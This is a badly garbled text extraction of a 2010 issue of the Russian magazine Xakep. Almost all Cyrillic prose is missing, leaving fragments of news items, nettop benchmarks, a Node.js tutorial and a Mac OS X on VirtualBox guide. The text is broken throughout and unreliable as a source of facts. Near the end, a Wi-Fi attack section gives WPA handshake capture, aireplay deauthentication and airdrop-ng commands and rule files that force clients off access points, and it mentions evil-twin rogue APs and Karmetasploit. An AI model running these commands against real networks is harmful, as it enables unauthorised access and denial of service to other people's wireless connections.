Хакер 2010 08 PDF

.
50
x 08 () 2010
.
210
:

08 (139) 2010
MALWARE

JAVASCRIPT
NODE.JS
. 30
/
139

WARDIVING
-
VIRUSTOTAL

. 74
INTRO
, ,
MALWARE, ()
. ,
,
,
, . :
, .
-
-
.
: ,

, .
Welcome to MALWARE!
nikitozz, . .
MegaNews
004
082
FERRUM
016
018
PopcornTV
Intel Atom
PC_ZONE
026
MacOS X + VirtualBox =
029
030
JavaScript
034
Microsoft's fail, ?
Node.js,
PHP, Perl Python
: ?
038
Easy-Hack
042
047
050
IT-
088
094
098
Linux
Linux
strace
104
108
112
Windows
115
C++
SYN/ACK
118
122
056
127
062
132
066
072
X-Tools
136
PSYCHO:
MALWARE
140
FAQ UNITED
074
VirusTotal
143
078
144
WWW2
egg hunt
AV-: !
VMware vSphere
FAQ
8.5
web-
026
MacOS X + VirtualBox =
056
050
074
VirusTotal
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)
/ART
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824

> GAMES & DIGITAL
(goryacheva@gameland.ru)
>

> Gameland TV

(rumyantseva@gameland.ru)
>
(strekneva@gameland.ru)
>

>

>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)
>

(korenfeld@gameland.ru)
>

/:
/ .: (495) 935-4034, : (495) 780-8824

>
(kosheleva@gameland.ru)
>

(goncharova@gameland.ru)
>
(lukicheva@gameland.ru)
> :

,
: claim@gameland.ru.
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.

.
.

:
content@gameland.ru
, , 2010
MEGANEWS
MIFRILL
MARIA.NEFEDOVA@GLC.RU
MEGANEWS

: OPEN SOURCE,
,
,
, (,
)
.
Open Source Hardware (OSHW). -,
,
, . -

,

, .
?
, .
, Liquidware
(www.liquidware.com) Beagle
Embedded Starter Kit .
: OLED-
BeagleTouch 4.3 (,
480 x 272), Li-ion
BeagleJuice 2600 mAh,
3-6 , SD- 4 ,
Angstrom Linux
BeagleBoard.

, .
: Linux
Android,

, , RFID-.
RFID- Android
,
.
$400,
, , ,
iPad :).
GOOGLE
, Amazon S3 , ( Amazon
S3 ][), Google Google Storage for Developers (code.google.com/apis/storage). S3
- . : , , . S3,
, ,
. , Amazon
, , , Google . ,
. , Google , - Google Storage manager
GSUtil,
. 100
300 . , , . , , ,
$0.105, Google $0.17. ,
.
004
X 08 /139/ 10
MEGANEWS
, , , ,
. 97 , ,
, ,
$800 . -
. ,
, . ,
2002 ,
. ,
, , ,
, , 2005 , .
70 .
- , , .
. ,
,
.
37000 Facebook ,

IPHONE 4, JUST AVOID HOLDING IT IN THAT WAY

112 WWDC 2010, , ;
.
.
Gizmodo,
, iPhone. - ,
,
Apple
, WWDC
. ,
, Apple .
- , .
: 30
20 .
,
iPhone. Apple ,
, .
, ,
: , , ,
!
. iPhone
9,3 . ,
iPhone . Bluetooth,
Wi-Fi, GPS,
006
GSM UMTS. :
,
,
, ,
! , Apple,

( : Just avoid
holding it in that way). : $29. , ,
:).
.
iPhone 4 , ,
Retina. Apple
3,5-
4 ,
iPhone. ,
78 960x640. ,

! ? !

5- ,
720p (
, LED). . ,
Wi-Fi
Facetime, iPhone 4,
Skype. ,
, A4, , ,
iOS 4.0.
.

,

,
SDK Apple.
X 08 /139/ 10
MEGANEWS

,

.
,
.
(),
8200,
,
.

. , ,
.
,

. ,
. -
, .
, ,

nmap,
.
3 2000
Yota. -
,
!
Step
Windows- ,

Wi-Fi, , Forb

:).
Parrot AR.Drone .
,
.

iPhone, Wi-Fi. ,
,

. .
,
Parrot AR.Drone,
,
.
Wi-Fi
008
,
. ,
(-

),
,
. Parrot AR.Drone
CES,

. ,
, .
.
, .
$299.99
$10001500! ,

,

ardrone.parrot.com,
.
X 08 /139/ 10
'&336.

!
Wings
2006

.
Wings
www.connection.ru,
,

!
(6.000 )
(12.000 )
(1.000.000 )

www.connection.ru.
: 5.000 ,
20
20 .

650 , 65 , ,
50
50 , .
?
www.connection.ru
,
, ,
- .
, ,

16
, 1 .
, Wings
: 5 9 ,
,
, .
www.connection.ru ,
\
.
:
,
,

, .
,
, -!
X 10 /130/ 09
-
-, (6.000
), (12.000 ),
(1.000.000
)? ,
,
!
MEGANEWS
?

Motorola: FlipOut

- .
: 67 67 x 17,
, 2.8" 320
240
QWERTY-.
:
.
,
.
FlipOut ,
, Android 2.1
:). -,

Android. ,
Motorola
Android 2.2 ?
MotoBlur,
Twitter Google. ; 600
512 . ,
Motorola ,
iPhone
Flash. , Webkit
Flash-
:). Motorola FlipOut

12 000 14 000 .
, , A-GPS,
3 .
iOS 4 65 ,

IOS 4.0 !
Apple, ,
, .
, Apple iOS 4.0, Dev-Team (blog.iphone-dev.org).
,
. ,
( ),
Apple. ,
PwnageTool,
Jailbreak
, . ,
. 4.0
redsn0w. Spirit (spiritjb.com),
iPad, . Apple , userland-. , .
010
X 08 /139/ 10
11
MEGANEWS
YAHOO!

15 Yahoo!, ,
. .
, Yahoo! Microsoft ,
Yahoo!
Bing. Microsoft, ,
10- ,
, Google. Bing
, , . Yahoo! Bing
, , .
Microsoft ,
. Yahoo!
, .
100 . , 10%

FBI VS. TRUECRYPT

, 2008
--. , ,
,

256- AES. ,
,
. ,
(INC), .
, ,
,
, :
. 5 . .
,
. - ,
INC ,
,
, .
,
. ,
, ,
Truecrypt,
. ,
... , . ,
, - ,
.. ..?
, , .

,
. MMO-
012
. :
, ? , - :).
, 2012 50%
MMO-, 41 . ( $6 .).
1- , 18 ,
. ,
. .
-. ,
, ,
. ,
,
$1.4 (10 ).

- . ,
14% 256 , 33
.
X 08 /139/ 10

, AOL
ICQ Digital Sky Technologies $187.5 .
DST ,
, ,
Mail.ru. : ,
,
,
. Financial Times ,

. FT ,
ICQ
.
, ICQ

. ,
? , ,
?

ICQ,
-. ,
, !
Google 20621 , 99%

40 .
GOOGLE :)
Google,
Android ,
. ,
. ,
, .
Android Market
, , ,
. ? . , ,
. Google
, , ,
, .
,
. ,
: , .
, ? ,
.
, , ,
.
, Android
: REMOVE_ASSET INSTALL_ASSET,
Google , .
Android TCP/SSL/XMPP- GTalk (-, ,
Gmail) , .

Google.
Google
. GTalkService
. Google
INSTALL_ASSET, Android APK- . , ,
REMOVE_ASSET, ,
. , , : Google
. , , - MITM- SSL- GTalkService
INSTALL_ASSET, - ?
GTalkService
? !
013
MEGANEWS
ASUS
,
iPad
. ,
, ,
,

, .
Asus
Computex
Asus ASUS
Eee Tablet,

. Eee Tablet
, , ,
TFT- 64
.
, 8-
1024 x 768,
2450
dpi, 0.1 .

10 . Eee Tablet
microSD, 2- , 3,5
(
), , , ,

Wacom.
Eee
Tablet

199-299
.
TWITTER.COM/KREMLINRUSSIA
40 ,
, .
: ! 6 !,
Twitter. ( Apple Cisco)
. :
Silicon Valley , ,
. , ,
, . . ,
. , . ,
, , .
!
128 -,
Toshiba
BIOS

014

Microstar (MSI). ,
BIOS ,
. BIOS UEFI-, MSI 2008 , Click
BIOS . UEFI (Universal Extensible Firmware Interface, ) Intel
EFI, , BIOS
, ,
. , UEFI Sandy
Bridge Intel : high-end.
2011. UEFI
, .
Seagate , UEFI ,
2 . BIOS UEFI ,
, C. ,
BIOS, . ROM ,
UEFI,
. , Express Gate Asus,
,
!
X 08 /139/ 10
WINDOWS 8
www.windowsette.com -
Microsoft,
.
Microsoft
Windows 8.
Apple .
- :
1. . Windows
Windows Recovery, ,
- . , Reset Windows, but keep my stuff,
, ,
, . ,
App Store.
.
2. Windows. Microsoft, -, ,
. - .
, POST (, ), (, )
Logoff +
Hibernate Boot. ,
, ,
X 08 /139/ 10
.
3. . ,
, - , .
Windows 8, , ,
-.
. .
WinFS, , ,
.
: , .
015
FERRUM

PopcornTV
HD- .
-,

,
. -,
HD-
.
, HD- ,
,
, Youtube ..
PopcornTV ,
-
.
, BBK :
BBK.
, c .
, ,
web-, .
Popcorn Linux
Syabas myiBox Browser, HTML-
() CSS JavaScript.
:
, , . ,
: Syabas Browser
, . -
, PHP, ASP .NET, Python, Ruby JSP.
:
HTML, .
PopcornTV :
HTML- - ,
, , , ,
016
. ,
live- , :
<a href="http://w01-cn01.akadostream.ru:8000/
silverrain48.mp3" aod> </a><br>
<a href="http://broadcast02.station.ru/dfm" aod>DFM
</a>
aod , -: aod = Audio On Demand

( ). , - -, vod pod .
, ,
: , ,
HTML-. : HTML-
web-.
Apache Tomcat JAVA-based -,
JSP-.
SDK,
.
Apache Tomcat,
Java-.
DVD, : tomcat
zip-, ,
X 08 /139/ 10
startup.
bat startup.sh *nix. Windows

JRE_HOME JAVA_HOME ,
Java.
Tomcat 8080 ( ),
-.
SDK .
,
ROOT SDK tomcat\webapps,

,
-.
XML, .
,

:
<?xml version="1.0"
encoding="UTF-8" ?>
<video>
<td>
<x:set var="id"
select="string(@id)"/>
<c:set var="url" value="http://dvd.
xakep.ru/videocast/${id}.mp4"/>
<x:set var="title"
select="string(@title)"/>
<a href="${url}" vod>
<img src="http://dvd.xakep.ru/
images/${id}.jpg" border="0">
</a>
<br />
<h2>${title}</h2>
</td>
<c:if test="${i %4 == 0}">
</tr><tr>
</c:if>
<c:set var="i" value="${i+1}"/>
</x:forEach>
,
: HTML-,
- , . JSTL
.

JSTL-:
ROOT. ,
http://localhost:8080,
SDK,
.
.

service.
, :
image
image-1280x720
page
page-1280x720
thumb
xml
,
, , : images
, page ,
, thumb ,
xml .
,

;
.

X 08 /139/ 10
<item id="1" title=" ROP"/>

<item id="2" title="
TDL3"/>
</video>
video.
xml xml, .
.
index.jsp, . JSP-
:
HTML .
-
Fast Template Smarty,
.

index.jsp :
<c:catch var="error">
<c:import var="xml"
charEncoding="utf-8" url=
"http://dvd.xakep.ru/video.xml"/>
<x:parse var="video" doc="${xml}"/>
<x:set var="videos"
select="$video//item"/>
</c:catch>
<c:set var="i" value="1"/>
<x:forEach select="$videos"
varStatus="s">
<c:catch> .
<c:import> xml
,
.
<x:parce> XML-.
<x:set> videos.
<x:forEach> XML-.
<c:if> .
: XML-,
item video,
,
. 4
</tr><tr> .
,
Tomcat,

portal.xml:
<service name="Xakep" id="xakep"
desc="Hackers video"/>
,
XML- (, ),
.
JSP-,
DVD. z
017
FERRUM

, .
1515 ! ,
, -,
, -, HD-.
VDS,
. , .

,
, ,
. , , . ,
PCMark05,
. , 3DMark03 3DMark06
. (
- !)
FarCry 2. :
018
SuperPI Geekbench.
, Intel Atom.
.
,
DVD
. ,
Windows 7 .
, ,
.
X 08 /139/ 10
Pro
3Q QOO!
TOWER ION
9400 .
: WINDOWS 7 HOME PREMIUM

: NVIDIA ION
: INTEL ATOM N230, 1.6
: 2 DDR2 ( 3 )
: HDD 320 (5400 ./)
: NVIDIA ION (GEFORCE 9400)
: 2- REALTEK ALC662
: 10/100/1000 /
: 6 USB 2.0, RJ45, DVI
: , ,

, : 170X150X20
ACER ASPIREREVO
R3600
:
12000 .
: WINDOWS VISTA HOME PREMIUM

: NVIDIA ION
: INTEL ATOM 230, 1.6
: 2 DDR2 (. 4 )
: HDD 160 (5400 ./), - 4--1 (SD/
SDHC/MMC/XD/MS/MS PRO)
: REALTEK HIGH DEFINITION AUDIO 7.1
: NVIDIA NFORCE 10/100/1000 /, WI-FI 802.11B/G
: 6 USB 2.0, ESATA, RJ45, VGA (D-SUB), HDMI
: , ,
, ,
, : 180X180X30
3Q Qoo!.
Windows 7 Home Premium, , . ,
, NVIDIA ION
,
HD-,
. ,
, . DVI.
, ,
.
, , , ACER AspireRevo R3600.
( )
ION NVIDIA,
. , , ,
, . ( )
USB, eSATA HDMI,
. Wi-Fi . ( , )
.
HDMI . , -, , ,
. -
.
, .
D-SUB DVI ,
. .
, , .
, .
X 08 /139/ 10
019
FERRUM
15000 .
13000 .
ASROCK ION
330-BD
ASUS EEEBOX
PC EB1012
:
: NVIDIA ION
: 2 DDR2 (. 4 )
: HDD 320 (5400 ./), BD COMBO
: NVIDIA NFORCE 10/100/1000 /
: 6 USB 2.0, RJ45, VGA (D-SUB), HDMI, S/PDIF
: ,
, : 19570186
, , , ,
, ,
.
Blu-Ray,
. , ,
, HDMI S/
PDIF. , ,
CD/DVD-.
, ASRock ION 330-BD ,

,
. , .
,
, . .
020
: WINDOWS 7 HOME PREMIUM

: NVIDIA ION
: 2 DDR2 (. 4 )
: HDD 250 (5400 ./), - (SD/SDHC/
MMC/MS/MS PRO)
: NVIDIA NFORCE 10/100/1000 /, WI-FI 802.11B/G/N
: 6 USB 2.0, RJ45, VGA (D-SUB), HDMI, E-SATA
: , , , ,
, ,
, : 222X178X26.9
ASUS
, ! , , . ,
, HD- ,
. Windows 7,
,
Wi-Fi IEEE 802.11n. , , !
, , -, -.
.
X 08 /139/ 10
12000 .
11000 .
VIEWSONIC
VOT120 PC Mini
ZOTAC
MAG MAGHD-ND01-U
: WINDOWS XP HOME
: INTEL 945GSE
: INTEL ATOM N270, 1.6
: 1 DDR2
: HDD 160 (5400 ./)
: INTEL 945GSE
: 2-
: 4 USB 2.0, RJ45, DVI, ESATA
: ,
, : 130X115X39
; .
Windows XP Home ,
,
.
, -, , ,
.
,
.
ViewSonic VOT120 PC Mini . -, ,

HD-,
. -, USB,
,
, .
X 08 /139/ 10
:
: NVIDIA ION
: INTEL ATOM 330, 1,6
: 2 DDR2
: HDD 160 (5400 ./), - (SD/SDHC/
MMC/XD/MS/MS PRO)
: 6 USB 2.0, RJ45, VGA (D-SUB), HDMI, ESATA, S/PDIF
: , ,

, : 186X189X38

, ZOTAC MAG MAGHD-ND01-U
. :
,
VESA- . , , , , ,
, .
DVI,
,
, , . ,
, - .
, .
021
FERRUM
PCMARK05
SUPERPI MOD 1.5 1M

ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P
92.589
107.342
92.563
92.761
92.76
92.754
0
20
40
60
80
100
ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P
120
2133
2122
2760
2413
2574
2104
0
500
1000
1500
2000
2500
ViewSonic
: ASUS, Acer ASRock
FAR CRY 2
3DMARK
ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P
ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P
7.69
4.8
10
8.27
8.23
4.35
0
10
12
fps
, ,
10 fps
3000
marks
1165
0
954
1588
4204
1419
4017
1411
4122
1115
3442
0 500 1000 1500 2000 2500 3000 3500 4000 4500
3DMark 06
3DMark 03
3450
marks
,
ViewSonic
GEEKBENCH 2.1
ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P
953
798
1544
1359
1181
855
0
200
400
600
800
1000
1200
1400
1600
1800
marks
ASRock ION 330BD, ,
022
Blu-Ray. ASUS EeeBox PC EB1012, ,

. z
X 08 /139/ 10
>> coding
lotus.xakep.ru
X-testing ontest
-
IBM Lotus Symphony 3.
Lotusphere 17 21 2011 !
DVD

- Lotus Symphony 3

,
Lotus Symphony Beta 3
lotus.xakep.ru. :
,
!
-
Lotus Symphony
.

.
freeware
opensource , IBM Lotus Symphony.
.
,
,
.
: 80%
20% Microsoft Office. ,
,
. IBM, 400 . , .
Lotus Symphony.

-. . ,

,
- . :

, .
IBM,
, ,
,
- Lotus Symphony.
:
?,
.

IBM ,
? ,
,
. ,
.
,
,
.
, ,

Lotus
1982:
Symphony
,
Lotus
Development Corporation

.
1983:

Lotus 1-2-3,

.

,

.
1984:
Lotus
Symphony

,
.
$695
12 360
.
,
.
, . Lotus Symphony ,

. , ,

.
.

.
.
,
( , ..) ,
.
198X:
80-

. Lotus
Development Corporation

.

.
1995:
IBM Lotus Development
Corporation $3,5
.

Lotus SmartSuite 3.1,

,
.

.
>> coding
Symphony Beta 3

Lotus Symphony ,

.

.
Must have!
,
.
,
Lotus Symphony , .
Minifuzz . ,
,
,
.

(,
,
),
.
-
199X:

5
Lotus SmartSuite.

32-
Lotus SmartSuite

.
fail Lotus
Microsoft Office.
Ftp Server plug-in
Symphony FTP-,
FTP- ( HTML)
.
Lotus Symphony ChartShare
,
. ,
URL.
IBM Lotus Symphony Diff plug-in
, .
Database Connection Plug-in
,
Lotus Symphony
(, Sql Server').
Peach
Fuzzer (peachfuzzer.com).

Capture-Playback,

.
, . ,

.
AutoIt,
, Sikuli

2007:
Lotus
Symphony
,
IBM

, .
,
Microsoft Office,
!
2008:
IBM

Lotus Symphony.

Lotus Symphony 60
.

, .

,

Jython .
, ,
-.
,
,
,
,
. , .
2010:

Vienna

,

,
.

.
2011:

Symphony (Amsterdam)

2011 .

,

.

.
PC_ZONE
Step twitter.com/stepah
MACOS X +
VIRTUALBOX =
Mac OS X Mac. , ,
Mac. ,
Mac OS X PC, , .
,
.

, iPhone/iPad - .
, SDK
Mac OS . , Mac
, , , , Macbook Pro 15"
, .
Mac OS PC, -
026
, ,
. ,
. ,
Microsoft, Parallels, VMware Sun,
( !) Mac OS ! , . changelog
VirtualBox' ( )
Oracle,
, :
X 08 /139/ 10
Mac OS X, VirtualBox
Experimental support for Mac OS X Server guests.
3.2.0 . ,
OS ?
server , ,
, Mac OS X. ,
Mac. , , Apple. VirtualBox,
, .
, VirtualBox' Mac OS X, Snow Leopard ( ).
,
, .
,
. , ,
Mac OS X Server. ,

mac , , leopard. 1024
20 (
Dynamically expanding storage). , -,
floppy-, -, , 128 . IDE-
ICH6, .
, ..
Mac OS X VT-x. Intel Virtualization Technology for

x86 Intel, ore 2 Duo/Quad i3/i5/
i7. Core 2 Duo E8500 Windows 7
.
AMD, ,
AMV-V.
Mac OS X (
10.6.3), , (
Windows!). Mac OS .dmg, ISO-
dmg2img (vu1tur.eu.org/tools): dmg2img source_file.
dmg destination_file.iso. X 08 /139/ 10
027
PC_ZONE
XML-
.
VirtualBox.
( , !)
XML- . XP
: C:\Documents and Settings\<username>\.VirtualBox\
Machines\<name of the VM>\<name of the VM>.xml, Vista/
Windows 7 C:\Users\<username>\.VirtualBox\Machines\<name
of the VM>\<name of the VM>.xml. Linux' XML
/home. ,
ExtraDataItem. :
<ExtraDataItem name="VBoxInternal2/EfiBootArgs"
value=" "/>
<ExtraDataItem name="VBoxInternal2/SmcDeviceKey"
value="ourhardworkbythesewordsguardedpleasedontsteal
(c)AppleComputerInc"/>
VirtualBox.
cdrome Mac OS X
. 90% , .
10% , .
- kernel-,
,
, .
( ExtraDataItem', ). ,
Empire EFI (prasys.co.cc/
tag/empire-efi). ISO- (, empireEFIv1085.iso),
.
Empire EFI
ISO' Snow
Leopard. (<F5>), <Enter>
, Mac OS X.
,
. , , ,
- . ,
(). ,
, .
, , .
. Reboot.
,
/, ,
.
028
(
<shift>),
. ,
<winkey>+<>.
MobileMe
, Mac ( , !?). ,
, , , .
, ,
Safari. Textmate,
Mac OS X, dmg- ( Mac OS X)
, . , ,
Mac', , ,
. , ,
ICH AC97, VirtualBox. ,
,
. ,
forums.virtualbox.org/viewtopic.php?f=4&t=30843,
kext'. PKG-,
. , , 1024x768. , ,
.
XML- ExtraDataItem :
<ExtraDataItem name="VBoxInternal2/EfiGopMode"
value="N"/>
N 0 4,
640x480, 800x600, 1024x768, 1280x1024, 1440x900 .
,
VirtualBox EFI. EFI
Extensible Firmware Interface, ,
.
, EFI , 1440x900
. , Guest Additions, , ,
.
SMB. .
:
.
SMB. Windows-
. :
smb://10.0.2.2. , 10.0.2.2 : ( VB ) .
MAC
Mac OS X
VirtualBox.

3D-
. flash-
. ,
. ,
, Mac': , . .z
X 08 /139/ 10
PC_ZONE
STEP TWITTER.COM/STEPAH
Microsoft's fail, ?

. ,
.
: -
,
, , ?
, . - Microsoft.
,
,
( WinFS),

, ,
, .
,
Windows 7
,
. ,
.

(
), , , ,

. ,
Microsoft:
X 08 /139/ 10
, . !
,
,
?
,
, ? , ,

(
, ). , msconfig
, ?
?

Autoruns Sysinternals?
: ,
. ,
userfriendly ? ?
,
Soluto (www.soluto.com). .

,
,
,
.
2 23 . ,
-
, ,
. - ,

.
,
No-brainer, Potentially reboot,
Required. .
,
.
Soluto , , .
. , ,
, WMP Sharing.

,
.

,
. , ,

, . ,
,
.
Potentially reboot
, . ,
(Required)
,
.

,
.
Soluto .
?
51 . . z
029
PC_ZONE
aleks.raiden@gmail.com
JavaScript
Node.js,
PHP, Perl Python
, PHP! Java! Perl,
. , Ruby Python!
.
, JavaScript.
. : ? ,
-!
, - , ? , .
AJAX,
, . ,
PHP , ,
. (
, )
, , ,
-.
- , (,
),
. ,
.
? CGI
( - ,
). FastCGI
,
. , , ,
.
.
JavaScript , ,
DOM-
030
-. , java
- ! :) , . ,

, -,
.
, , , :
JavaScript ?
: ,
. , JS , -. , :
.
. ,
, PHP/
Perl-, ,
.
, ,
, . -
, , ,
.
Nginx. JavaScript
, ,
, .
. callback,
.
, X 08 /139/ 10
Node.js - V8
,
, ,
/Ruby/Python.
, ?

PHP JavaScript,
. PHP:
$result = $db->fetchOne('SELECT user_name FROM user_
accounts WHERE id = 1');
echo ' : ' . $result . ';';
SQL- , id = 1. :
,
, , $result. ,
,
,
, .
JS,
:
db.query('SELECT user_name FROM user_accounts WHERE
id = 1', function(err, res){
if (!err) sys.log(' : ' + res);
});
sys.log(' ');

JAVASCRIPT
, ,
.

,
.
JS,
.
Narwhal (narwhaljs.org) ,
JS-. ,

.
CommonJS (commonjs.org) API , API, API
.
JSGI (JavaScript gate interface) - JavaScript. , Rhino jetty.
X 08 /139/ 10
Node.js
,
SQL- -
(callback). ,
,
. , , ,
. ,
JavaScript callback',
.
.
,
( ..)
(, ,
). ,
,
.
, JavaScript
, .
?
, .
Rhino Mozilla, Java 1.7 JS,
.
JVM, , ,
Java. ,
- jetty, JS. ,
Rhino Google! . , ,
, JIT-,
Java-. , , ,
Rhino , ,
: ,
Java - ( PHP), , , . , ,
, , .
SpiderMonkey Mozilla, C.
, JS,
Netscape
Firefox, Adobe Acrobat
- Ultima Online.
, JS -
031
PC_ZONE
-
, TraceMonkey 3.6 Firefox. SpiderMonkey
, /++ . : Comet- APE, noSQL
CouchDB, Jaxer Apache mod_js.
Futhark Opera, , , Unite ( ), ,
Opera Mini. , ,
Opera .
V8 Google, Chrome
Chrome OS. ,
, JS-
,
.
,
, (, , ,
..). Node.JS.
NODE.JS
, Chrome ,
. V8cgi,
, -
CGI. Node.js
, , , (HTTP
TCP/UDP/Unix-soket) ,
.
,
. , , Plurk ( ),
comet-,
Java JBoss Netty, Node.js , , .
.
HTTP-,
:
var sys = require('sys'),
http = require('http');
http.createServer(function (req, res) {
res.writeHead(200, {'Content-Type': 'text/plain'});
res.end('Hello World\n');
}).listen(80, "127.0.0.1");
sys.puts('Server running at http://127.0.0.1:80/');
, example.js
node:
032
Node.js
Windows-
% node example.js
Server running at http://127.0.0.1:80/
.
Apache Bench , : running ab -n 1000 -c 100
http://127.0.0.1:80/. , , 100
. 3000
. !
C++ ,

JavaScript.
, ,
.
, :
, 0.0.1, .

, ,
, ( MySQL, ).
JavaScript, , ,
API .
NODE.JS
Node, ,
. , ,
. ,
(, , , ).
,
WebWorker HTML5
. ,
. ,
- , - ( ,
memcached' NoSQL-),
Comet',
, .
Node .
, ,
EventEmiter,
( , , , ).
X 08 /139/ 10
INFO
info
, API
"text/plain"});
tail.stdout.addListener("data", function
(data) { res.write(data); });
}).listen(80);

Node EventLoop
, ,
-
. , .
. JS,
, C,
(
). - .
(GC),
. Node.js
.
STEAMING-
,
,

.
, ,
-:
var sys = require('sys'),
net = require('net'),
spawn = require('child_process').spawn,
http = require("http");
sys.puts('\nMy process PID: ' +
process.pid + '\n');
var tail = spawn('tail', ['-f',
'/var/log/nginx/access.log']);
//
sys.puts("Start tailing");
tail.stdout.addListener("data",
function (data) {
sys.puts(data);
//
});
http.createServer(function(req,res){
res.sendHeader(200,{"Content-Type":
X 08 /139/ 10
spawn() tail, , ,
, ,
.
. ,
, tail
- . data (
) ,
tail, write(). ,
HTTP-. .

-,
node.js ,
. : node
tail.js error.log http://localhost:80.
,
error.log.
,
web 2.0 , , - ,
, . ,
, , .
, Perl , Python
, Ruby .
,
, 25-
Zend-framework. - ,
, ,
, -?
JavaScript , .
, ,
. ,
, Node.JS
. , , ,
,
!z
,
,
Node.
JS
Github,
- ,
,
.
HTTP://WWW
links

NodeJS:
groups.google.com/
group/nodejs

:
forum.nodejs.ru
JS:
en.wikipedia.org/
wiki/Server-side_
JavaScript

Node.JS:
www.slideshare.
net/the_undefined/
nodejs-a-quick-tour
Node.
JS:
nodejs.org/jsconf.pdf
033
PC_ZONE

: ?
: Linux ,
, , ,
. ?
, , ,
, , . ,
, ,
, .
, .
, ,
, ,
.
-, , WEP (Wired
Equivalent Privacy), , ,
, WPA/WPA2 (Wi-Fi Protected Access).
WEP , 100%
- .
WPA/WPA2, , , ,
.

.
Wi-Fi-, airodump,
-. ,
.
,
.
WEP IV,
WPA/WPA WPA Handshake.
,
034
, .
, ,
. ,
AP .
. aireplay .
, ,
(monitor mode), .
,
Wi-Fi *nix-.
Backtrack, .
UNetbootin
(unetbootin.sourceforge.net). :
,
. ,
aircrack,
WEP,
WPA/WPA2. , .
, airodump, aireplay aircrack
Aircrack-ng (aircrack-ng.org).
WI-FI CRACKER

( ,
WPA2). . airodump,
X 08 /139/ 10
Python

.

( MAC-)
, aireplay deuth, -
( , MAC').
WPA Handshake,
aircrack,
. , .
,
, -
MAC-, .
MA macchanger, , aireplay .
?
, , , .
Aircrack-ng (bit.ly/wifi_adapter_list).
,
,
RTL8187L. USB $20.
Wi-Fi
X 08 /139/ 10
SpoonWPA, -

,
.
1. AUTOMATIC WPA HANDSHAKE CAPTURE (code.google.com/p/svtoolz).
, Python' ,
. ,
WPA hanshake',
. , ,
..
(, mon0), , MAC-
, dump- Handshake'.
2. SPOONWEP/SPOONWPA (forums.remote-exploit.org). Backtrack3 .
: .
, , SpoonWep/SpoonWpa
aircrack-ng
.
,
. , , ,
, .
3. GERIX WIFI CRACKER (forums.remote-exploit.org). , SpoonWep/SpoonWpa, Backtrack'
. , , ,
Gerix Wifi cracker. , ,
. : Configuration
(
) , ,
. , -, Start Sniffing and Logging Perform a test of
injection AP WEP WPA, . Fake AP

airbase-ng.
, ,
,
035
PC_ZONE
Airdrop-ng
, , ,
. ,
(d/Linksys|any): Company OUI,
WI-FI
Gerix Wifi cracker
Backtrack 4
. aireplayng, mdk3, Void11 , ,
,
AP.
, . Shmoocon Airdrop-ng.
?
. . . , .
, , .
, . ,
( ), ,
,
(,
Dell). .
.
: action/ap/client.
action (a allow)
(d deny). ap client , . :
Backtrack , , ,
. Wi-Fi,
, .
1. MegaNews Wi-Fi, .
, , Wi-Fi USB-,
, Backtrack ,
Spoonwep/Spoonwpa.
. ;
, - dealextreme.com. ,
nag.ru
lan23.ru.
2. , , WiFi Pineapple (WiFi
Pineapple).
Rogue AP. , . 4- .
$144, ,
.
Fon 2100 (www.fon.com)
Atheros, (bit.ly/onoffswitch),
KARMA Jasager
(www.digininja.org/jasager). www.hak5.org/w/index.php/
Jasager
.
a(allow)/bssid mac(or 'any')|client mac(or 'any')
d(deny)/bssid mac(or 'any')|client mac(or 'any')
Airdrop-ng ,
.
: d/00-11-22-33-44-55|any.
(any) ,
MAC- 00:11:22:33:44:55. MAC'
036
X 08 /139/ 10
MAC- .
. ,
Wi-Fi Apple: d/any|Apple.
: client
MAC-, , 11:22:33:44:55:66,00:
11:22:33:44:55,55:44:33:22:11:0. ,
.
AIRDROP-NG
Airdrop-ng Python
airodump-ng Lorcon 1.
Backtrack,
:
apt-get update
apt-get install airdrop-ng

:
1) Wi-Fi-
:
airmon-ng start wlan0
2) airodump,
.csv-:
airodump-ng -w dumpfile --output-format csv
mon0
3) AirDrop.
, AP, mac = 00-11-22-3344-55, rules:
nano rules
d/00-11-22-33-44-55|any
4) , airdrop-ng, csv- :
airdrop-ng -i mon0 -t dumpfile.csv -r rules
,
.
"-b", .
,
. ,
,
:
#Allow-
a/00-11-22-33-44-55|55-44-33-22-11-00
#Deny-
d/00-11-22-33-44-55|any
,
MAC- 55-44-33-22-11-00,
- . , Airdrop-ng
:). !
X 08 /139/ 10
Backtrack 4 , Wi-Fi
EVIL TWINS V2.0
, , , Airdrop-ng MITM. , AP
,

, .
Free Wi-Fi, ,
, ,
AP-, .
Evil Twins ( Rogue AP) 2004
.
,
probe-,
. ,
, ESSID
, ,
, ,
. , : ,
,
. ,
AP,
.
Airdrop-ng ,
AP, ( IP
00:aa:bb:cc:dd:ee):
WARNING
info

.
,
-,
, , -,
.
.

.
a/00:aa:bb:cc:dd:ee|any
d/any|any

Rogue AP.
KARMA 2004 . Metasploit, Karmetasploit
(bit.ly/Karmetasploit)
.
.
Airdrop-ng,
Shmoocon (www.
shmoocon.org/2010/slides/wifibomb.zip). ,
,
. .z
037

